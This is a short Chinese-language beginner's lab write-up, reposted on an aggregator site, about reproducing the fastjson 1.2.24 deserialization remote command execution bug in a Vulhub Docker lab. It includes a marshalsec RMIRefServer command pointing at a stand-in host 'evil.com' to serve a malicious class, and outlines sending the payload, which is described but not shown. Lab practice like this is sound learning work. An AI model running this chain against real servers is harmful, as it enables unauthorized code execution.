概述
目录
- 写在前面的
- 漏洞信息
- 主要步骤
- 1. 创建TouchFile.java并编译,上传到服务器中
- 2. 从gitHub上拉取 [marshalsec](https://github.com/mbechler/marshalsec).并编译生成jar文件,启动RMI服务
- 3.向靶场服务器发送Payload,带上RMI的地址
- 4.查看docker容器中是否有success文件夹
- 注意
写在前面的
网络安全小白一枚,对网安比较感兴趣,计划把 Vulhub 列出来的问题逐个尝试下,Vulhub中有详细的漏洞说明,光看是不行的,一定要亲自操作一番,为此记录下遇到问题。
漏洞信息
漏洞详情: fastjson 1.2.24 反序列化导致任意命令执行漏洞.
主要步骤
1. 创建TouchFile.java并编译,上传到服务器中
这里我用python3的http.server搭建一个简单的web服务,把编译后的TouchFile.class上传到web服务中
2. 从gitHub上拉取 marshalsec.并编译生成jar文件,启动RMI服务
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://evil.com/#TouchFile" 9999
注意:你的web服务是有端口号的的!
3.向靶场服务器发送Payload,带上RMI的地址
修改body里的信息,注意RMI地址别写错
4.查看docker容器中是否有success文件夹
#在/vulhub/fastjson/1.2.24-rce下执行
docker-compose exec web ls / tmp
如果有success表示成功
注意
我的服务器没有域名用的ip,忘加端口号导致RMI服务找不到这个文件,一直失败。注意端口
最后
以上就是危机蜡烛为你收集整理的Vulhub fastjson1.2.24写在前面的的全部内容,希望文章能够帮你解决Vulhub fastjson1.2.24写在前面的所遇到的程序开发问题。
如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。
本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
发表评论 取消回复